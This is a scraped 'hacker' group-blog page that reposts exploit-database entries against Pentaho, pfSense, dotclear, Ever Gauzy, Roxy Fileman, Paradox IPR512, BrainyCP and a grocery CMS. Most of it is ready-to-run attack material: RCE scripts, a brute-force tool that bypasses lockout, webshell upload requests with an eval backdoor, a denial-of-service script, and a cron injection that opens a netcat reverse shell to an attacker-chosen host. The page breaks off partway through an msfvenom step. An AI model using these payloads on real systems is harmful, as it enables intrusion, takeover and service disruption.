Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863118188

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).

# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
import requests
import argparse

parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()

url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"

print ("running...")
r = requests.get(url)
if r.text == 'false':
    print ("command should've executed! nice.")
else:
    print ("didn't work. sadge...")
HireHackking 
#!/usr/bin/python3

## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100

# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66

import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning

# Expected Arguments
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
                                 formatter_class=argparse.RawTextHelpFormatter,
                                 epilog=textwrap.dedent(''' 
Exploit Usage : 
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))

parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
    sys.exit(1)

# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList

# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')


def login(userlogin, userpasswd):
    session = requests.session()
    r = session.get(url, verify=False)

    # Getting CSRF token value
    csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
    csrftoken = csrftoken.group(1)

    # Specifying Headers Value
    headerscontent = {
        'User-Agent': 'Mozilla/5.0',
        'Referer': f"{url}",
        'X-Forwarded-For': '42.42.42.42'
    }

    # POST REQ data
    postreqcontent = {
        '__csrf_magic': f"{csrftoken}",
        'usernamefld': f"{userlogin}",
        'passwordfld': f"{userpasswd}",
        'login': 'Sign+In'
    }

    # Sending POST REQ
    r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)

    # Conditional loops
    if r.status_code != 200:
        print(f'[*] - Found Valid Credential !!')
        print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
        sys.exit(0)


# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()

for user in userfile:
    user = user.strip()
    for passwd in passfile:
        passwd = passwd.strip()
        login(user, passwd)
HireHackking 
Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)
Application: dotclear
Version: 2.25.3
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://dotclear.org/
Software Link: https://dotclear.org/download
Date of found: 08.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
While writing a blog post, we know that we can upload images. But php did not allow file upload. This time
<?php echo system("id"); ?>
 I wrote a file with the above payload, a poc.phar extension, and uploaded it.
We were able to run the php code when we visited your page


poc request:


POST /dotclear/admin/post.php HTTP/1.1
Host: localhost
Content-Length: 566
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc
Connection: close

post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=



poc video : https://youtu.be/oIPyLqLJS70
HireHackking

ever gauzy v0.281.9 - JWT weak HMAC secret

HACKER · %s · %s

## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret ## Author: nu11secur1ty ## Date: 04.08.2023 ## Vendor: https://gauzy.co/ ## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9 ## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret ## Description: It was, detected a JWT signed using a well-known `HMAC secret key`. The key used which was found was a secret Key. The user can find a secret key authentication while sending normal post requests. After he found the `Authorization: Bearer` key he can use it to authenticate and he can be sending a very malicious POST request, it depends on the scenario. STATUS: [+]Issue: JWT weak HMAC secret [+]Severity: High [+]Exploit: ```GET GET /api/auth/authenticated HTTP/2 Host: apidemo.gauzy.co Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112" Accept: application/json, text/plain, */* Language: en Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjJjMWViM2ViLTI3ZDEtNGE2Ni05YjEzLTg4ODVhNmFhYWJlMiIsInRlbmFudElkIjoiMTA0YjhiMDQtNmYzNi00YWMzLWFjNWItNTg4MWQyNjJmMWUxIiwiZW1wbG95ZWVJZCI6bnVsbCwicm9sZSI6IlNVUEVSX0FETUlOIiwicGVybWlzc2lvbnMiOlsiQURNSU5fREFTSEJPQVJEX1ZJRVciLCJURUFNX0RBU0hCT0FSRCIsIlBST0pFQ1RfTUFOQUdFTUVOVF9EQVNIQk9BUkQiLCJUSU1FX1RSQUNLSU5HX0RBU0hCT0FSRCIsIkFDQ09VTlRJTkdfREFTSEJPQVJEIiwiSFVNQU5fUkVTT1VSQ0VfREFTSEJPQVJEIiwiT1JHX1BBWU1FTlRfVklFVyIsIk9SR19QQVlNRU5UX0FERF9FRElUIiwiT1JHX0lOQ09NRVNfVklFVyIsIk9SR19JTkNPTUVTX0VESVQiLCJPUkdfRVhQRU5TRVNfVklFVyIsIk9SR19FWFBFTlNFU19FRElUIiwiUFJPRklMRV9FRElUIiwiRU1QTE9ZRUVfRVhQRU5TRVNfVklFVyIsIkVNUExPWUVFX0VYUEVOU0VTX0VESVQiLCJPUkdfUFJPUE9TQUxTX1ZJRVciLCJPUkdfUFJPUE9TQUxTX0VESVQiLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX1ZJRVciLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX0VESVQiLCJPUkdfVEFTS19BREQiLCJPUkdfVEFTS19WSUVXIiwiT1JHX1RBU0tfRURJVCIsIk9SR19UQVNLX0RFTEVURSIsIk9SR19USU1FX09GRl9WSUVXIiwiT1JHX0VNUExPWUVFU19WSUVXIiwiT1JHX0VNUExPWUVFU19FRElUIiwiT1JHX0NBTkRJREFURVNfVklFVyIsIk9SR19DQU5ESURBVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV19WSUVXIiwiT1JHX0NBTkRJREFURVNfRE9DVU1FTlRTX1ZJRVciLCJPUkdfQ0FORElEQVRFU19UQVNLX0VESVQiLCJPUkdfQ0FORElEQVRFU19GRUVEQkFDS19FRElUIiwiT1JHX0lOVkVOVE9SWV9QUk9EVUNUX0VESVQiLCJPUkdfSU5WRU5UT1JZX1ZJRVciLCJPUkdfVEFHU19BREQiLCJPUkdfVEFHU19WSUVXIiwiT1JHX1RBR1NfRURJVCIsIk9SR19UQUdTX0RFTEVURSIsIk9SR19VU0VSU19WSUVXIiwiT1JHX1VTRVJTX0VESVQiLCJPUkdfSU5WSVRFX1ZJRVciLCJPUkdfSU5WSVRFX0VESVQiLCJBTExfT1JHX1ZJRVciLCJBTExfT1JHX0VESVQiLCJQT0xJQ1lfVklFVyIsIlBPTElDWV9FRElUIiwiVElNRV9PRkZfRURJVCIsIlJFUVVFU1RfQVBQUk9WQUxfVklFVyIsIlJFUVVFU1RfQVBQUk9WQUxfRURJVCIsIkFQUFJPVkFMU19QT0xJQ1lfVklFVyIsIkFQUFJPVkFMU19QT0xJQ1lfRURJVCIsIkNIQU5HRV9TRUxFQ1RFRF9FTVBMT1lFRSIsIkNIQU5HRV9TRUxFQ1RFRF9DQU5ESURBVEUiLCJDSEFOR0VfU0VMRUNURURfT1JHQU5JWkFUSU9OIiwiQ0hBTkdFX1JPTEVTX1BFUk1JU1NJT05TIiwiQUNDRVNTX1BSSVZBVEVfUFJPSkVDVFMiLCJUSU1FU0hFRVRfRURJVF9USU1FIiwiU1VQRVJfQURNSU5fRURJVCIsIlBVQkxJQ19QQUdFX0VESVQiLCJJTlZPSUNFU19WSUVXIiwiSU5WT0lDRVNfRURJVCIsIkVTVElNQVRFU19WSUVXIiwiRVNUSU1BVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdFUlNfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV0VSU19WSUVXIiwiVklFV19BTExfRU1BSUxTIiwiVklFV19BTExfRU1BSUxfVEVNUExBVEVTIiwiT1JHX0hFTFBfQ0VOVEVSX0VESVQiLCJWSUVXX1NBTEVTX1BJUEVMSU5FUyIsIkVESVRfU0FMRVNfUElQRUxJTkVTIiwiQ0FOX0FQUFJPVkVfVElNRVNIRUVUIiwiT1JHX1NQUklOVF9WSUVXIiwiT1JHX1NQUklOVF9FRElUIiwiT1JHX0NPTlRBQ1RfRURJVCIsIk9SR19DT05UQUNUX1ZJRVciLCJPUkdfUFJPSkVDVF9BREQiLCJPUkdfUFJPSkVDVF9WSUVXIiwiT1JHX1BST0pFQ1RfRURJVCIsIk9SR19QUk9KRUNUX0RFTEVURSIsIk9SR19URUFNX0FERCIsIk9SR19URUFNX1ZJRVciLCJPUkdfVEVBTV9FRElUIiwiT1JHX1RFQU1fREVMRVRFIiwiT1JHX1RFQU1fSk9JTl9SRVFVRVNUX1ZJRVciLCJPUkdfVEVBTV9KT0lOX1JFUVVFU1RfRURJVCIsIk9SR19DT05UUkFDVF9FRElUIiwiRVZFTlRfVFlQRVNfVklFVyIsIlRJTUVfVFJBQ0tFUiIsIlRFTkFOVF9BRERfRVhJU1RJTkdfVVNFUiIsIklOVEVHUkFUSU9OX1ZJRVciLCJGSUxFX1NUT1JBR0VfVklFVyIsIlBBWU1FTlRfR0FURVdBWV9WSUVXIiwiU01TX0dBVEVXQVlfVklFVyIsIkNVU1RPTV9TTVRQX1ZJRVciLCJJTVBPUlRfRVhQT1JUX1ZJRVciLCJNSUdSQVRFX0dBVVpZX0NMT1VEIiwiT1JHX0pPQl9FTVBMT1lFRV9WSUVXIiwiT1JHX0pPQl9NQVRDSElOR19WSUVXIiwiSU5WRU5UT1JZX0dBTExFUllfQUREIiwiSU5WRU5UT1JZX0dBTExFUllfVklFVyIsIklOVkVOVE9SWV9HQUxMRVJZX0VESVQiLCJJTlZFTlRPUllfR0FMTEVSWV9ERUxFVEUiLCJNRURJQV9HQUxMRVJZX0FERCIsIk1FRElBX0dBTExFUllfVklFVyIsIk1FRElBX0dBTExFUllfRURJVCIsIk1FRElBX0dBTExFUllfREVMRVRFIiwiT1JHX0VRVUlQTUVOVF9WSUVXIiwiT1JHX0VRVUlQTUVOVF9FRElUIiwiT1JHX0VRVUlQTUVOVF9TSEFSSU5HX1ZJRVciLCJPUkdfRVFVSVBNRU5UX1NIQVJJTkdfRURJVCIsIkVRVUlQTUVOVF9NQUtFX1JFUVVFU1QiLCJFUVVJUE1FTlRfQVBQUk9WRV9SRVFVRVNUIiwiT1JHX1BST0RVQ1RfVFlQRVNfVklFVyIsIk9SR19QUk9EVUNUX1RZUEVTX0VESVQiLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX1ZJRVciLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX0VESVQiLCJWSUVXX0FMTF9BQ0NPVU5USU5HX1RFTVBMQVRFUyIsIlRFTkFOVF9TRVRUSU5HIiwiQUxMT1dfREVMRVRFX1RJTUUiLCJBTExPV19NT0RJRllfVElNRSIsIkFMTE9XX01BTlVBTF9USU1FIiwiREVMRVRFX1NDUkVFTlNIT1RTIl0sImlhdCI6MTY4MDk4MDAzMn0.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.gauzy.co Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.gauzy.co/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 76 { "email":"local.admin@ever.co", "password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED" } ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9) ## Proof and Exploit: [href](https://streamable.com/afsmee) ## Time spend: 03:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Roxy Fileman 1.4.5 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Upload # Date: 09/04/2023 # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # Vendor Homepage: roxyfileman.com # Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net # Version: <= 1.4.5 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ########################################################################################## # First, we upload the .jpg shell file to the server. # ########################################################################################## POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 666 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="action" upload ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="method" ajax ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="d" /Upload/PenTest ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="files[]"; filename="test.jpg" Content-Type: image/jpeg ‰PNG <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundarygOxjsc2hpmwmISeJ-- ########################################################################################## # In the second stage, we manipulate the .jpg file that we uploaded to the server. # ########################################################################################## { "FILES_ROOT": "", "RETURN_URL_PREFIX": "", "SESSION_PATH_KEY": "", "THUMBS_VIEW_WIDTH": "140", "THUMBS_VIEW_HEIGHT": "120", "PREVIEW_THUMB_WIDTH": "300", "PREVIEW_THUMB_HEIGHT":"200", "MAX_IMAGE_WIDTH": "1000", "MAX_IMAGE_HEIGHT": "1000", "INTEGRATION": "ckeditor", "DIRLIST": "asp_net/main.ashx?a=DIRLIST", "CREATEDIR": "asp_net/main.ashx?a=CREATEDIR", "DELETEDIR": "asp_net/main.ashx?a=DELETEDIR", "MOVEDIR": "asp_net/main.ashx?a=MOVEDIR", "COPYDIR": "asp_net/main.ashx?a=COPYDIR", "RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR", "FILESLIST": "asp_net/main.ashx?a=FILESLIST", "UPLOAD": "asp_net/main.ashx?a=UPLOAD", "DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD", "DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR", "DELETEFILE": "asp_net/main.ashx?a=DELETEFILE", "MOVEFILE": "asp_net/main.ashx?a=MOVEFILE", "COPYFILE": "asp_net/main.ashx?a=COPYFILE", "RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE", "GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB", "DEFAULTVIEW": "list", "FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess", "ALLOWED_UPLOADS": "bmp gif png jpg jpeg", "FILEPERMISSIONS": "0644", "DIRPERMISSIONS": "0755", "LANG": "auto", "DATEFORMAT": "dd/MM/yyyy HH:mm", "OPEN_LAST_DIR": "yes" } ############################################################################################################################################################################################################################ # We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. # ############################################################################################################################################################################################################################ POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 44 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx =========================================================================================================================================================================================================================== POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 68 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx ########################################################################################## # and it's done! # ########################################################################################## HTTP/2 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/10.0 X-Aspnet-Version: 4.0.30319 X-Powered-By-Plesk: PleskWin Date: Sun, 09 Apr 2023 09:49:34 GMT Content-Length: 21 {"res":"ok","msg":""} =============================================================================================
HireHackking

Paradox Security Systems IPR512 - Denial Of Service

HACKER · %s · %s

#!/bin/bash # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service # Google Dork: intitle:"ipr512 * - login screen" # Date: 09-APR-2023 # Exploit Author: Giorgi Dograshvili # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423) # Version: IPR512 # CVE : CVE-2023-24709 # Function to display banner message display_banner() { echo "******************************************************" echo "* *" echo "* PoC CVE-2023-24709 *" echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *" echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *" echo "* by SlashXzerozero *" echo "* *" echo "******************************************************" } # Call the function to display the banner display_banner echo "" echo "" echo "Please enter a domain name or IP address with or without port" read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain # Step 2: Ask for user confirmation read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm if [[ $confirm == "Y" || $confirm == "y" ]]; then # Display loading animation animation=("|" "/" "-" "\\") index=0 while [[ $index -lt 10 ]]; do echo -ne "Loading ${animation[index]} \r" sleep 1 index=$((index + 1)) done # Use curl to send HTTP GET request with custom headers and timeout response=$(curl -i -s -k -X GET \ -H "Host: $domain" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \ -H "Accept: */" \ -H "Referer: http://$domain/login.html" \ -H "Accept-Encoding: gzip, deflate" \ -H "Accept-Language: en-US,en;q=0.9" \ -H "Connection: close" \ --max-time 10 \ "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982") # Check response for HTTP status code 200 and print result if [[ $response == *"HTTP/1.1 200 OK"* ]]; then echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html" else echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html" fi else echo "The script is stopped!." fi
HireHackking

BrainyCP V1.0 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: BrainyCP V1.0 - Remote Code Execution # Date: 2023-04-03 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://brainycp.io # Demo: https://demo.brainycp.io # Tested on: Kali Linux # CVE : N/A import requests # credentials url = input("URL: ") username = input("Username: ") password = input("Password: ") ip = input("IP: ") port = input("Port: ") # login session = requests.Session() login_url = f"{url}/auth.php" login_data = {"login": username, "password": password, "lan": "/"} response = session.post(login_url, data=login_data) if "Sign In" in response.text: print("[-] Wrong credentials or may the system patched.") exit() # reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash" # request add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron" add_cron_data = { "cron_freq_minutes": "*", "cron_freq_minutes_own": "", "cron_freq_hours": "*", "cron_freq_hours_own": "", "cron_freq_days": "*", "cron_freq_days_own": "", "cron_freq_months": "*", "cron_freq_weekdays": "*", "cron_command": reverse_shell, "cron_user": username, } response = session.post(add_cron_url, data=add_cron_data) print("[+] Check your listener!")
HireHackking
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE) # Date: 4/23/2023 # Author: Or4nG.M4n # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: windows # # Vuln File : SystemSettings.php < here you can inject php code # if(isset($_POST['content'])){ # foreach($_POST['content'] as $k => $v) # file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want # } # Vuln File : home.php < here you can include and execute you're php code # <h3 class="text-center">Welcome</h3> # <hr> # <div class="welcome-content"> # <?php include("welcome.html") ?> <=== include # </div> import requests url = input("Enter url :") postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'} resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata) print("[+] injection in welcome page") print("[+]"+url+"/?cmd=ls -al") print("\n")
HireHackking

Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path

HACKER · %s · %s

########################################################################## # # # Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path # # Date: 2023/04/22 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.arcsoft.com/ # # My Github: https://github.com/msd0pe-1 # # # ########################################################################## Arcsoft PhotoStudio: Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto [2] Get informations about the service: > sc qc "ADExchange" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ADExchange TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ArcSoft Exchange Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp 